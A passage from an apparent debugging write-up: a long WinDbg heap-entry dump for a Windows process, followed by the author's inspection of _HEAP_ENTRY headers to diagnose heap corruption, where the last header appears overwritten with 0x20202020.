  00a23fd0: 000f0 . 001b0 [01] - busy (1a4)
  00a24180: 001b0 . 003a0 [01] - busy (397)
  00a24520: 003a0 . 001e0 [01] - busy (1d4)
  00a24700: 001e0 . 00200 [01] - busy (1f8)
  00a24900: 00200 . 00150 [01] - busy (146)
  00a24a50: 00150 . 00258 [01] - busy (250)
  00a24ca8: 00258 . 001e8 [01] - busy (1d9)
  00a24e90: 001e8 . 00258 [01] - busy (250)
  00a250e8: 00258 . 00158 [01] - busy (150)
  00a25240: 00158 . 001e0 [01] - busy (1d8)
  00a25420: 001e0 . 001e0 [01] - busy (1d8)
  00a25600: 001e0 . 00080 [01] - busy (78)
  00a25680: 00080 . 00070 [01] - busy (60)
  00a256f0: 00070 . 001e0 [01] - busy (1d8)
  00a258d0: 001e0 . 00608 [01] - busy (600)
  00a25ed8: 00608 . 00338 [01] - busy (330)
  00a26210: 00338 . 00188 [01] - busy (180)
  00a26398: 00188 . 00278 [01] - busy (26a)
  00a26610: 00278 . 001e0 [01] - busy (1d8)
  00a267f0: 001e0 . 00188 [01] - busy (180)
  00a26978: 00188 . 00178 [01] - busy (16c)
  00a26af0: 00178 . 002b8 [01] - busy (2ae)
  00a26da8: 002b8 . 00188 [01] - busy (180)
  00a26f30: 00188 . 001e0 [01] - busy (1d8)
  00a27110: 001e0 . 00188 [01] - busy (180)
  00a27298: 00188 . 00180 [01] - busy (174)
  00a27418: 00180 . 00178 [01] - busy (16c)
  00a27590: 00178 . 00168 [01] - busy (160)
  00a276f8: 00168 . 00178 [01] - busy (16c)
  00a27870: 00178 . 00170 [01] - busy (164)
  00a279e0: 00170 . 00180 [01] - busy (174)
  00a27b60: 00180 . 00168 [01] - busy (15c)
  00a27cc8: 00168 . 00168 [01] - busy (15c)
  00a27e30: 00168 . 00178 [01] - busy (16c)
  00a27fa8: 00178 . 00168 [01] - busy (160)
  00a28110: 00168 . 00118 [01] - busy (10c)
  00a28228: 00118 . 00130 [01] - busy (121)
  00a28358: 00130 . 001f8 [01] - busy (1eb)
  00a28550: 001f8 . 001c0 [01] - busy (1b2)
  00a28710: 001c0 . 00150 [01] - busy (144)
  00a28860: 00150 . 00188 [01] - busy (17d)
  00a289e8: 00188 . 00280 [01] - busy (278)
  00a28c68: 00280 . 002b0 [01] - busy (2a4)
  00a28f18: 002b0 . 00020 [01] - busy (18)
  00a28f38: 00020 . 000f0 [01] - busy (e8)
  00a29028: 000f0 . 001e0 [01] - busy (1d8)
  00a29208: 001e0 . 000c8 [01] - busy (c0)
  00a292d0: 000c8 . 00298 [01] - busy (290)
  00a29568: 00298 . 00178 [01] - busy (170)
  00a296e0: 00178 . 00608 [01] - busy (600)
  00a29ce8: 00608 . 001c0 [01] - busy (1b4)
  00a29ea8: 001c0 . 00110 [01] - busy (104)
  00a29fb8: 00110 . 00128 [01] - busy (11c)
  00a2a0e0: 00128 . 00140 [01] - busy (134)
  00a2a220: 00140 . 00020 [01] - busy (14)
  00a2a240: 00020 . 00608 [01] - busy (600)
  00a2a848: 00608 . 00170 [01] - busy (164)
  00a2a9b8: 00170 . 00138 [01] - busy (12c)
  00a2aaf0: 00138 . 00028 [01] - busy (20)
  00a2ab18: 00028 . 001e0 [01] - busy (1d8)
  00a2acf8: 001e0 . 00188 [01] - busy (180)
  00a2ae80: 00188 . 000c8 [01] - busy (c0)
  00a2af48: 000c8 . 00098 [00]
  00a2afe0: 00098 . 001e0 [01] - busy (1d8)
  00a2b1c0: 001e0 . 00188 [01] - busy (180)
  00a2b348: 00188 . 000c8 [01] - busy (c0)
  00a2b410: 000c8 . 00098 [01] - busy (8c)
  00a2b4a8: 00098 . 001e0 [01] - busy (1d8)
  00a2b688: 001e0 . 00188 [01] - busy (180)
  00a2b810: 00188 . 000c8 [01] - busy (c0)
  00a2b8d8: 000c8 . 00098 [01] - busy (88)
  00a2b970: 00098 . 001e0 [01] - busy (1d8)
  00a2bb50: 001e0 . 00188 [01] - busy (180)
  00a2bcd8: 00188 . 000c8 [01] - busy (c0)
  00a2bda0: 000c8 . 00098 [01] - busy (84)
  00a2be38: 00098 . 00188 [01] - busy (180)
  00a2bfc0: 00188 . 001e0 [01] - busy (1d8)
  00a2c1a0: 001e0 . 00308 [01] - busy (300)
  00a2c4a8: 00308 . 00178 [01] - busy (169)
  00a2c620: 00178 . 00168 [01] - busy (160)
  00a2c788: 00168 . 000c8 [01] - busy (c0)
  00a2c850: 000c8 . 00088 [01] - busy (80)
  00a2c8d8: 00088 . 00010 [01] - busy (4)
  00a2c8e8: 00010 . 001e0 [01] - busy (1d8)
  00a2cac8: 001e0 . 00188 [01] - busy (180)
  00a2cc50: 00188 . 00188 [01] - busy (180)
  00a2cdd8: 00188 . 00608 [01] - busy (600)
  00a2d3e0: 00608 . 001e0 [01] - busy (1d8)
  00a2d5c0: 001e0 . 00160 [01] - busy (158)
  00a2d720: 00160 . 00188 [01] - busy (180)
  00a2d8a8: 00188 . 001e0 [01] - busy (1d8)
  00a2da88: 001e0 . 00188 [01] - busy (180)
  00a2dc10: 00188 . 00160 [01] - busy (157)
  00a2dd70: 00160 . 001e0 [01] - busy (1d8)
  00a2df50: 001e0 . 00188 [01] - busy (180)
  00a2e0d8: 00188 . 00160 [01] - busy (158)
  00a2e238: 00160 . 001e0 [01] - busy (1d8)
  00a2e418: 001e0 . 00188 [01] - busy (180)
  00a2e5a0: 00188 . 00168 [01] - busy (15c)
  00a2e708: 00168 . 00188 [01] - busy (180)
  00a2e890: 00188 . 00178 [01] - busy (170)
  00a2ea08: 00178 . 00168 [01] - busy (160)
  00a2eb70: 00168 . 00188 [01] - busy (180)
  00a2ecf8: 00188 . 00608 [01] - busy (600)
  00a2f300: 00608 . 001b8 [01] - busy (1b0)
  00a2f4b8: 001b8 . 00168 [01] - busy (15c)
  00a2f620: 00168 . 00170 [01] - busy (164)
  00a2f790: 00170 . 00168 [01] - busy (15c)
  00a2f8f8: 00168 . 001d0 [01] - busy (1c7)
  00a2fac8: 001d0 . 00120 [01] - busy (113)
  00a2fbe8: 00120 . 00018 [01] - busy (10)
  00a2fc00: 00018 . 00268 [01] - busy (25c)
  00a2fe68: 00268 . 00128 [01] - busy (120)
  00a2ff90: 00128 . 00248 [01] - busy (240)
  00a301d8: 00248 . 00198 [01] - busy (18f)
  00a30370: 00198 . 00210 [01] - busy (204)
  00a30580: 00210 . 00048 [01] - busy (40)
  00a305c8: 00048 . 00350 [01] - busy (344)
  00a30918: 00350 . 00288 [01] - busy (27e)
  00a30ba0: 00288 . 00180 [01] - busy (176)
  00a30d20: 00180 . 00108 [01] - busy (100)
  00a30e28: 00108 . 00058 [01] - busy (48)
  00a30e80: 00058 . 00160 [01] - busy (158)
  00a30fe0: 00160 . 00030 [01] - busy (24)
  00a31010: 00030 . 00160 [01] - busy (158)
  00a31170: 00160 . 001e0 [01] - busy (1d8)
  00a31350: 001e0 . 00188 [01] - busy (180)
  00a314d8: 00188 . 001e0 [01] - busy (1d8)
  00a316b8: 001e0 . 00160 [01] - busy (154)
  00a31818: 00160 . 001e0 [01] - busy (1d8)
  00a319f8: 001e0 . 00188 [01] - busy (180)
  00a31b80: 00188 . 00160 [01] - busy (158)
  00a31ce0: 00160 . 001e0 [01] - busy (1d8)
  00a31ec0: 001e0 . 00608 [01] - busy (600)
  00a324c8: 00608 . 00190 [01] - busy (188)
  00a32658: 00190 . 00608 [01] - busy (600)
  00a32c60: 00608 . 00608 [01] - busy (600)
  00a33268: 00608 . 001e0 [01] - busy (1d8)
  00a33448: 001e0 . 001e0 [01] - busy (1d8)
  00a33628: 001e0 . 00170 [01] - busy (164)
  00a33798: 00170 . 00170 [01] - busy (164)
  00a33908: 00170 . 00170 [01] - busy (168)
  00a33a78: 00170 . 00170 [01] - busy (168)
  00a33be8: 00170 . 00168 [01] - busy (160)
  00a33d50: 00168 . 00170 [01] - busy (164)
  00a33ec0: 00170 . 00178 [01] - busy (16c)
  00a34038: 00178 . 00188 [01] - busy (180)
  00a341c0: 00188 . 00188 [01] - busy (180)
  00a34348: 00188 . 00188 [01] - busy (180)
  00a344d0: 00188 . 00188 [01] - busy (180)
  00a34658: 00188 . 00170 [01] - busy (164)
  00a347c8: 00170 . 00170 [01] - busy (168)
  00a34938: 00170 . 00168 [01] - busy (15c)
  00a34aa0: 00168 . 00170 [01] - busy (168)
  00a34c10: 00170 . 00160 [01] - busy (158)
  00a34d70: 00160 . 00260 [01] - busy (251)
  00a34fd0: 00260 . 00b60 [01] - busy (b53)
  00a35b30: 00b60 . 003b8 [01] - busy (3ad)
  00a35ee8: 003b8 . 000c8 [01] - busy (c0)
  00a35fb0: 000c8 . 00198 [01] - busy (190)
  00a36148: 00198 . 001f8 [01] - busy (1ec)
  00a36340: 001f8 . 00168 [01] - busy (160)
  00a364a8: 00168 . 00170 [01] - busy (168)
  00a36618: 00170 . 001d0 [01] - busy (1c4)
  00a367e8: 001d0 . 00198 [01] - busy (190)
  00a36980: 00198 . 001b8 [01] - busy (1b0)
  00a36b38: 001b8 . 00168 [01] - busy (15c)
  00a36ca0: 00168 . 00178 [01] - busy (16c)
  00a36e18: 00178 . 00170 [01] - busy (164)
  00a36f88: 00170 . 00180 [01] - busy (174)
  00a37108: 00180 . 00178 [01] - busy (170)
  00a37280: 00178 . 00180 [01] - busy (178)
  00a37400: 00180 . 00178 [01] - busy (16c)
  00a37578: 00178 . 00170 [01] - busy (164)
  00a376e8: 00170 . 00168 [01] - busy (15c)
  00a37850: 00168 . 00188 [01] - busy (17c)
  00a379d8: 00188 . 00170 [01] - busy (164)
  00a37b48: 00170 . 00190 [01] - busy (184)
  00a37cd8: 00190 . 00160 [01] - busy (158)
  00a37e38: 00160 . 003a0 [01] - busy (398)
  00a381d8: 003a0 . 002b0 [01] - busy (2a4)
  00a38488: 002b0 . 002a8 [01] - busy (29c)
  00a38730: 002a8 . 002a8 [01] - busy (29c)
  00a389d8: 002a8 . 00248 [01] - busy (23c)
  00a38c20: 00248 . 00248 [01] - busy (23c)
  00a38e68: 00248 . 00138 [01] - busy (12c)
  00a38fa0: 00138 . 00048 [01] - busy (3a)
  00a38fe8: 00048 . 00018 [00]
  00a39000: 00018 . 00178 [01] - busy (16f)
  00a39178: 00178 . 00188 [01] - busy (180)
  00a39300: 00188 . 00110 [01] - busy (108)
  00a39410: 00110 . 00188 [01] - busy (180)
  00a39598: 00188 . 00138 [01] - busy (12d)
  00a396d0: 00138 . 00180 [01] - busy (174)
  00a39850: 00180 . 00010 [01] - busy (4)
  00a39860: 00010 . 00010 [01] - busy (4)
  00a39870: 00010 . 00168 [01] - busy (15c)
  00a399d8: 00168 . 18008 [01] - busy (18000)
  00a519e0: 18008 . 002c0 [01] - busy (2b4)
  00a51ca0: 002c0 . 00368 [01] - busy (35d)
  00a52008: 00368 . 00198 [01] - busy (18e)
  00a521a0: 00198 . 00330 [01] - busy (324)
  00a524d0: 00330 . 00488 [01] - busy (47c)
  00a52958: 00488 . 003c8 [01] - busy (3c0)
  00a52d20: 003c8 . 00608 [01] - busy (600)
  00a53328: 00608 . 001d8 [01] - busy (1c9)
  00a53500: 001d8 . 00188 [01] - busy (180)
  00a53688: 00188 . 001e0 [01] - busy (1d8)
  00a53868: 001e0 . 00108 [01] - busy (100)
  00a53970: 00108 . 00108 [01] - busy (100)
  00a53a78: 00108 . 00108 [01] - busy (100)
  00a53b80: 00108 . 00160 [01] - busy (158)
  00a53ce0: 00160 . 00190 [01] - busy (180)
  00a53e70: 00190 . 00178 [01] - busy (16c)
  00a53fe8: 00178 . 00188 [01] - busy (180)
  00a54170: 00188 . 00180 [01] - busy (174)
  00a542f0: 00180 . 00028 [01] - busy (20)
  00a54318: 00028 . 00018 [01] - busy (10)
  00a54330: 00018 . 01300 [01] - busy (12f7)
  00a55630: 01300 . 00818 [01] - busy (809)
  00a55e48: 00818 . 001b0 [01] - busy (1a8)
  00a55ff8: 001b0 . 00288 [01] - busy (27b)
  00a56280: 00288 . 00488 [01] - busy (47e)
  00a56708: 00488 . 00188 [01] - busy (180)
  00a56890: 00188 . 00188 [01] - busy (180)
  00a56a18: 00188 . 00188 [01] - busy (180)
  00a56ba0: 00188 . 00188 [01] - busy (180)
  00a56d28: 00188 . 00188 [01] - busy (17c)
  00a56eb0: 00188 . 00128 [01] - busy (120)
  00a56fd8: 00128 . 00010 [01] - busy (8)
  00a56fe8: 00010 . 001b8 [01] - busy (1b0)
  00a571a0: 001b8 . 00188 [01] - busy (180)
  00a57328: 00188 . 00188 [01] - busy (180)
  00a574b0: 00188 . 00608 [01] - busy (600)
  00a57ab8: 00608 . 00170 [01] - busy (161)
  00a57c28: 00170 . 001e0 [01] - busy (1d8)
  00a57e08: 001e0 . 00188 [01] - busy (180)
  00a57f90: 00188 . 00048 [01] - busy (40)
  00a57fd8: 00048 . 00018 [00]
  00a57ff0: 00018 . 003e8 [01] - busy (3dc)
  00a583d8: 003e8 . 00188 [01] - busy (17c)
  00a58560: 00188 . 00450 [01] - busy (441)
  00a589b0: 00450 . 000c8 [01] - busy (c0)
  00a58a78: 000c8 . 00010 [01] - busy (8)
  00a58a88: 00010 . 00010 [01] - busy (4)
  00a58a98: 00010 . 003e8 [01] - busy (3dc)
  00a58e80: 003e8 . 00120 [01] - busy (114)
  00a58fa0: 00120 . 00010 [01] - busy (8)
  00a58fb0: 00010 . 00040 [00]
  00a58ff0: 00040 . 00170 [01] - busy (164)
  00a59160: 00170 . 00288 [01] - busy (280)
  00a593e8: 00288 . 00188 [01] - busy (180)
  00a59570: 00188 . 00168 [01] - busy (15c)
  00a596d8: 00168 . 00170 [01] - busy (164)
  00a59848: 00170 . 001e0 [01] - busy (1d8)
  00a59a28: 001e0 . 00050 [01] - busy (40)
  00a59a78: 00050 . 00190 [01] - busy (188)
  00a59c08: 00190 . 00190 [01] - busy (185)
  00a59d98: 00190 . 00178 [01] - busy (16c)
  00a59f10: 00178 . 00170 [01] - busy (168)
  00a5a080: 00170 . 00160 [01] - busy (154)
  00a5a1e0: 00160 . 00178 [01] - busy (170)
  00a5a358: 00178 . 003e8 [01] - busy (3dc)
  00a5a740: 003e8 . 001d0 [01] - busy (1c7)
  00a5a910: 001d0 . 00160 [01] - busy (157)
  00a5aa70: 00160 . 001b0 [01] - busy (1a8)
  00a5ac20: 001b0 . 00188 [01] - busy (17e)
  00a5ada8: 00188 . 00210 [01] - busy (202)
  00a5afb8: 00210 . 00050 [01] - busy (40)
  00a5b008: 00050 . 00240 [01] - busy (238)
  00a5b248: 00240 . 002a8 [01] - busy (29c)
  00a5b4f0: 002a8 . 00248 [01] - busy (23c)
  00a5b738: 00248 . 00278 [01] - busy (270)
  00a5b9b0: 00278 . 002a8 [01] - busy (29c)
  00a5bc58: 002a8 . 00278 [01] - busy (270)
  00a5bed0: 00278 . 00248 [01] - busy (23c)
  00a5c118: 00248 . 00278 [01] - busy (270)
  00a5c390: 00278 . 00278 [01] - busy (270)
  00a5c608: 00278 . 00248 [01] - busy (23c)
  00a5c850: 00248 . 00248 [01] - busy (23c)
  00a5ca98: 00248 . 00248 [01] - busy (23c)
  00a5cce0: 00248 . 00248 [01] - busy (23c)
  00a5cf28: 00248 . 00248 [01] - busy (23c)
  00a5d170: 00248 . 00248 [01] - busy (23c)
  00a5d3b8: 00248 . 001a0 [01] - busy (194)
  00a5d558: 001a0 . 00248 [01] - busy (23c)
  00a5d7a0: 00248 . 00248 [01] - busy (23c)
  00a5d9e8: 00248 . 00248 [01] - busy (23c)
  00a5dc30: 00248 . 00248 [01] - busy (23c)
  00a5de78: 00248 . 00248 [01] - busy (23c)
  00a5e0c0: 00248 . 00248 [01] - busy (23c)
  00a5e308: 00248 . 00248 [01] - busy (23c)
  00a5e550: 00248 . 00248 [01] - busy (23c)
  00a5e798: 00248 . 00248 [01] - busy (23c)
  00a5e9e0: 00248 . 00248 [01] - busy (23c)
  00a5ec28: 00248 . 002a8 [01] - busy (29c)
  00a5eed0: 002a8 . 002a8 [01] - busy (29c)
  00a5f178: 002a8 . 00248 [01] - busy (23c)
  00a5f3c0: 00248 . 002a8 [01] - busy (29c)
  00a5f668: 002a8 . 002a8 [01] - busy (29c)
  00a5f910: 002a8 . 00248 [01] - busy (23c)
  00a5fb58: 00248 . 00248 [01] - busy (23c)
  00a5fda0: 00248 . 002a8 [01] - busy (29c)
  00a60048: 002a8 . 002a8 [01] - busy (29c)
  00a602f0: 002a8 . 002a8 [01] - busy (29c)
  00a60598: 002a8 . 002a8 [01] - busy (29c)
  00a60840: 002a8 . 002a8 [01] - busy (29c)
  00a60ae8: 002a8 . 002a8 [01] - busy (29c)
  00a60d90: 002a8 . 00248 [01] - busy (23c)
  00a60fd8: 00248 . 002a8 [01] - busy (29c)
  00a61280: 002a8 . 00248 [01] - busy (23c)
  00a614c8: 00248 . 00248 [01] - busy (23c)
  00a61710: 00248 . 00248 [01] - busy (23c)
  00a61958: 00248 . 00248 [01] - busy (23c)
  00a61ba0: 00248 . 002a8 [01] - busy (29c)
  00a61e48: 002a8 . 00280 [01] - busy (278)
  00a620c8: 00280 . 00280 [01] - busy (278)
  00a62348: 00280 . 00248 [01] - busy (23c)
  00a62590: 00248 . 00248 [01] - busy (23c)
  00a627d8: 00248 . 00248 [01] - busy (23c)
  00a62a20: 00248 . 00248 [01] - busy (23c)
  00a62c68: 00248 . 00248 [01] - busy (23c)
  00a62eb0: 00248 . 00248 [01] - busy (23c)
  00a630f8: 00248 . 00248 [01] - busy (23c)
  00a63340: 00248 . 00248 [01] - busy (23c)
  00a63588: 00248 . 00248 [01] - busy (23c)
  00a637d0: 00248 . 00248 [01] - busy (23c)
  00a63a18: 00248 . 00248 [01] - busy (23c)
  00a63c60: 00248 . 00248 [01] - busy (23c)
  00a63ea8: 00248 . 00248 [01] - busy (23c)
  00a640f0: 00248 . 00248 [01] - busy (23c)
  00a64338: 00248 . 00248 [01] - busy (23c)
  00a64580: 00248 . 00248 [01] - busy (23c)
  00a647c8: 00248 . 00248 [01] - busy (23c)
  00a64a10: 00248 . 00248 [01] - busy (23c)
  00a64c58: 00248 . 00248 [01] - busy (23c)
  00a64ea0: 00248 . 001c8 [01] - busy (1bc)
  00a65068: 001c8 . 00248 [01] - busy (23c)
  00a652b0: 00248 . 00248 [01] - busy (23c)
  00a654f8: 00248 . 00248 [01] - busy (23c)
  00a65740: 00248 . 00220 [01] - busy (218)
  00a65960: 00220 . 00248 [01] - busy (23c)
  00a65ba8: 00248 . 00248 [01] - busy (23c)
  00a65df0: 00248 . 00278 [01] - busy (270)
  00a66068: 00278 . 00248 [01] - busy (23c)
  00a662b0: 00248 . 00248 [01] - busy (23c)
  00a664f8: 00248 . 00248 [01] - busy (23c)
  00a66740: 00248 . 00248 [01] - busy (23c)
  00a66988: 00248 . 00118 [01] - busy (110)
  00a66aa0: 00118 . 00248 [01] - busy (23c)
  00a66ce8: 00248 . 00248 [01] - busy (23c)
  00a66f30: 00248 . 00118 [01] - busy (110)
  00a67048: 00118 . 00248 [01] - busy (23c)
  00a67290: 00248 . 00248 [01] - busy (23c)
  00a674d8: 00248 . 00220 [01] - busy (218)
  00a676f8: 00220 . 00248 [01] - busy (23c)
  00a67940: 00248 . 00248 [01] - busy (23c)
  00a67b88: 00248 . 00248 [01] - busy (23c)
  00a67dd0: 00248 . 00248 [01] - busy (23c)
  00a68018: 00248 . 00248 [01] - busy (23c)
  00a68260: 00248 . 00248 [01] - busy (23c)
  00a684a8: 00248 . 00248 [01] - busy (23c)
  00a686f0: 00248 . 00248 [01] - busy (23c)
  00a68938: 00248 . 00248 [01] - busy (23c)
  00a68b80: 00248 . 00248 [01] - busy (23c)
  00a68dc8: 00248 . 00248 [01] - busy (23c)
  00a69010: 00248 . 00248 [01] - busy (23c)
  00a69258: 00248 . 00130 [01] - busy (128)
  00a69388: 00130 . 00248 [01] - busy (23c)
  00a695d0: 00248 . 00248 [01] - busy (23c)
  00a69818: 00248 . 00118 [01] - busy (110)
  00a69930: 00118 . 00248 [01] - busy (23c)
  00a69b78: 00248 . 00248 [01] - busy (23c)
  00a69dc0: 00248 . 00248 [01] - busy (23c)
  00a6a008: 00248 . 002a8 [01] - busy (29c)
  00a6a2b0: 002a8 . 00248 [01] - busy (23c)
  00a6a4f8: 00248 . 00248 [01] - busy (23c)
  00a6a740: 00248 . 00248 [01] - busy (23c)
  00a6a988: 00248 . 00248 [01] - busy (23c)
  00a6abd0: 00248 . 00248 [01] - busy (23c)
  00a6ae18: 00248 . 00248 [01] - busy (23c)
  00a6b060: 00248 . 00120 [01] - busy (118)
  00a6b180: 00120 . 00248 [01] - busy (23c)
  00a6b3c8: 00248 . 00248 [01] - busy (23c)
  00a6b610: 00248 . 00248 [01] - busy (23c)
  00a6b858: 00248 . 00248 [01] - busy (23c)
  00a6baa0: 00248 . 00248 [01] - busy (23c)
  00a6bce8: 00248 . 00248 [01] - busy (23c)
  00a6bf30: 00248 . 00248 [01] - busy (23c)
  00a6c178: 00248 . 00248 [01] - busy (23c)
  00a6c3c0: 00248 . 00248 [01] - busy (23c)
  00a6c608: 00248 . 00148 [01] - busy (140)
  00a6c750: 00148 . 00160 [01] - busy (158)
  00a6c8b0: 00160 . 02018 [01] - busy (2010)
  00a6e8c8: 02018 . 01008 [01] - busy (1000)
  00a6f8d0: 01008 . 00ad8 [00]
  00a703a8: 00ad8 . 00120 [01] - busy (115)
  00a704c8: 00120 . 00358 [01] - busy (34d)
  00a70820: 00358 . 00188 [01] - busy (180)
  00a709a8: 00188 . 00110 [01] - busy (104)
  00a70ab8: 00110 . 00050 [01] - busy (40)
  00a70b08: 00050 . 00358 [01] - busy (34c)
  00a70e60: 00358 . 00168 [01] - busy (160)
  00a70fc8: 00168 . 00118 [01] - busy (109)
  00a710e0: 00118 . 001c8 [01] - busy (1c0)
  00a712a8: 001c8 . 00168 [01] - busy (160)
  00a71410: 00168 . 00210 [01] - busy (202)
  00a71620: 00210 . 001e0 [01] - busy (1d8)
  00a71800: 001e0 . 00188 [01] - busy (180)
  00a71988: 00188 . 000f8 [00]
  00a71a80: 000f8 . 01808 [01] - busy (1800)
  00a73288: 01808 . 01808 [01] - busy (1800)
  00a74a90: 01808 . 01808 [01] - busy (1800)
  00a76298: 01808 . 00188 [01] - busy (180)
  00a76420: 00188 . 00188 [01] - busy (180)
  00a765a8: 00188 . 001e0 [01] - busy (1d8)
  00a76788: 001e0 . 00308 [01] - busy (300)
  00a76a90: 00308 . 00608 [01] - busy (600)
  00a77098: 00608 . 00180 [01] - busy (178)
  00a77218: 00180 . 00168 [01] - busy (160)
  00a77380: 00168 . 00180 [01] - busy (178)
  00a77500: 00180 . 00168 [01] - busy (15c)
  00a77668: 00168 . 00198 [01] - busy (190)
  00a77800: 00198 . 001f8 [01] - busy (1ec)
  00a779f8: 001f8 . 00188 [01] - busy (17c)
  00a77b80: 00188 . 00170 [01] - busy (164)
  00a77cf0: 00170 . 00170 [01] - busy (168)
  00a77e60: 00170 . 00178 [01] - busy (170)
  00a77fd8: 00178 . 00198 [01] - busy (18c)
  00a78170: 00198 . 001f8 [01] - busy (1ec)
  00a78368: 001f8 . 00170 [01] - busy (164)
  00a784d8: 00170 . 00170 [01] - busy (164)
  00a78648: 00170 . 00168 [01] - busy (15c)
  00a787b0: 00168 . 001b8 [01] - busy (1b0)
  00a78968: 001b8 . 00180 [01] - busy (174)
  00a78ae8: 00180 . 00188 [01] - busy (180)
  00a78c70: 00188 . 00100 [00]
  00a78d70: 00100 . 00180 [01] - busy (174)
  00a78ef0: 00180 . 00608 [01] - busy (600)
  00a794f8: 00608 . 00208 [01] - busy (200)
  00a79700: 00208 . 00188 [01] - busy (180)
  00a79888: 00188 . 00608 [01] - busy (600)
  00a79e90: 00608 . 00308 [01] - busy (300)
  00a7a198: 00308 . 00220 [01] - busy (214)
  00a7a3b8: 00220 . 003f8 [00]
  00a7a7b0: 003f8 . 003d0 [01] - busy (3c2)
  00a7ab80: 003d0 . 00248 [01] - busy (240)
  00a7adc8: 00248 . 00318 [01] - busy (30f)
  00a7b0e0: 00318 . 00228 [01] - busy (21e)
  00a7b308: 00228 . 00378 [01] - busy (370)
  00a7b680: 00378 . 00168 [01] - busy (160)
  00a7b7e8: 00168 . 00278 [01] - busy (270)
  00a7ba60: 00278 . 001e0 [01] - busy (1d8)
  00a7bc40: 001e0 . 00520 [01] - busy (518)
  00a7c160: 00520 . 00268 [01] - busy (25e)
  00a7c3c8: 00268 . 00178 [01] - busy (16f)
  00a7c540: 00178 . 00120 [01] - busy (116)
  00a7c660: 00120 . 00170 [01] - busy (167)
  00a7c7d0: 00170 . 00268 [01] - busy (25a)
  00a7ca38: 00268 . 003d8 [01] - busy (3cf)
  00a7ce10: 003d8 . 004d0 [01] - busy (4c2)
  00a7d2e0: 004d0 . 00408 [01] - busy (3fa)
  00a7d6e8: 00408 . 00118 [01] - busy (10c)
  00a7d800: 00118 . 00118 [01] - busy (10c)
  00a7d918: 00118 . 001a0 [01] - busy (197)
  00a7dab8: 001a0 . 00118 [01] - busy (10c)
  00a7dbd0: 00118 . 00608 [01] - busy (600)
  00a7e1d8: 00608 . 001e0 [01] - busy (1d8)
  00a7e3b8: 001e0 . 00188 [01] - busy (17b)
  00a7e540: 00188 . 00228 [01] - busy (21b)
  00a7e768: 00228 . 00068 [01] - busy (5c)
  00a7e7d0: 00068 . 00010 [01] - busy (4)
  00a7e7e0: 00010 . 00160 [01] - busy (154)
  00a7e940: 00160 . 00188 [01] - busy (180)
  00a7eac8: 00188 . 00160 [01] - busy (158)
  00a7ec28: 00160 . 00188 [01] - busy (180)
  00a7edb0: 00188 . 00160 [01] - busy (154)
  00a7ef10: 00160 . 00188 [01] - busy (180)
  00a7f098: 00188 . 00c08 [01] - busy (c00)
  00a7fca0: 00c08 . 001a8 [01] - busy (1a0)
  00a7fe48: 001a8 . 00188 [01] - busy (180)
  00a7ffd0: 00188 . 00018 [01] - busy (c)
  00a7ffe8: 00018 . 00018 [11] - busy (c)
  Segment02 at 00a80000:
  Flags: 00000000
  Base:00a80000
  First Entry: 00a80040
  Last Entry:00c80000
  Total Pages: 00000200
  Total UnCommit:00000175
  Largest UnCommit:00172000
  UnCommitted Ranges: (2)
  00acb000: 00003000
  00b0e000: 00172000
  
  Heap entries for Segment02 in Heap 00970000
  00a80000: 00000 . 00040 [01] - busy (40)
  00a80040: 00040 . 40008 [01] - busy (40000)
  00ac0048: 40008 . 00170 [01] - busy (164)
  00ac01b8: 00170 . 01808 [01] - busy (1800)
  00ac19c0: 01808 . 00408 [01] - busy (400)
  00ac1dc8: 00408 . 000c8 [01] - busy (c0)
  00ac1e90: 000c8 . 000c8 [01] - busy (c0)
  00ac1f58: 000c8 . 000a8 [01] - busy (93)
  00ac2000: 000a8 . 03008 [01] - busy (3000)
  00ac5008: 03008 . 00460 [01] - busy (453)
  00ac5468: 00460 . 00190 [01] - busy (188)
  00ac55f8: 00190 . 00188 [01] - busy (180)
  00ac5780: 00188 . 00170 [01] - busy (164)
  00ac58f0: 00170 . 00170 [01] - busy (164)
  00ac5a60: 00170 . 000d0 [00]
  00ac5b30: 000d0 . 001a0 [01] - busy (196)
  00ac5cd0: 001a0 . 001e0 [01] - busy (1d8)
  00ac5eb0: 001e0 . 05150 [10]
  00acb000:00003000- uncommitted bytes.
  00ace000: 00000 . 00018 [01] - busy (10)
  00ace018: 00018 . 00018 [01] - busy (10)
  00ace030: 00018 . 00198 [01] - busy (18f)
  00ace1c8: 00198 . 001e8 [01] - busy (1d9)
  00ace3b0: 001e8 . 00118 [01] - busy (10f)
  00ace4c8: 00118 . 003f8 [01] - busy (3eb)
  00ace8c0: 003f8 . 00168 [01] - busy (15a)
  00acea28: 00168 . 003e8 [01] - busy (3dc)
  00acee10: 003e8 . 001e0 [01] - busy (1d7)
  00aceff0: 001e0 . 00130 [01] - busy (128)
  00acf120: 00130 . 00030 [00]
  00acf150: 00030 . 001e0 [01] - busy (1d8)
  00acf330: 001e0 . 00160 [01] - busy (154)
  00acf490: 00160 . 001e0 [01] - busy (1d8)
  00acf670: 001e0 . 00160 [01] - busy (154)
  00acf7d0: 00160 . 001e0 [01] - busy (1d8)
  00acf9b0: 001e0 . 000c8 [01] - busy (c0)
  00acfa78: 000c8 . 00160 [01] - busy (158)
  00acfbd8: 00160 . 001e0 [01] - busy (1d8)
  00acfdb8: 001e0 . 00188 [01] - busy (180)
  00acff40: 00188 . 0c008 [01] - busy (c000)
  00adbf48: 0c008 . 20020 [01] - busy (20015)
  00afbf68: 20020 . 10020 [01] - busy (10015)
  00b0bf88: 10100 . 10100 [20]
  unable to read heap entry at 00b1c088
  
  The error message shown by windbg "unable to read heap entry at.." partially confirms that its a sign of memory / heap corruption. 
  
  0:000> dt _HEAP_ENTRY 00adbf48
  ntdll!_HEAP_ENTRY
   +0x000 Size : 0x4004
   +0x002 PreviousSize : 0x1801
   +0x000 SubSegmentCode : 0x18014004 
   +0x004 SmallTagIndex: 0xc3 ''
   +0x005 Flags: 0x1 ''
   +0x006 UnusedBytes: 0xb ''
   +0x007 SegmentIndex : 0x2 ''
  
  			
  0:000> dt _HEAP_ENTRY 00afbf68
  ntdll!_HEAP_ENTRY
   +0x000 Size : 0x2004
   +0x002 PreviousSize : 0x4004
   +0x000 SubSegmentCode : 0x40042004 
   +0x004 SmallTagIndex: 0xc7 ''
   +0x005 Flags: 0x1 ''
   +0x006 UnusedBytes: 0xb ''
   +0x007 SegmentIndex : 0x2 ''
  
  Above two entries actually make sense. size and previous size matches for both of them. Now lets dessect the last entry
  
  0:000> dt _HEAP_ENTRY 00b0bf88
  ntdll!_HEAP_ENTRY
   +0x000 Size : 0x2020
   +0x002 PreviousSize : 0x2020
   +0x000 SubSegmentCode : 0x20202020 
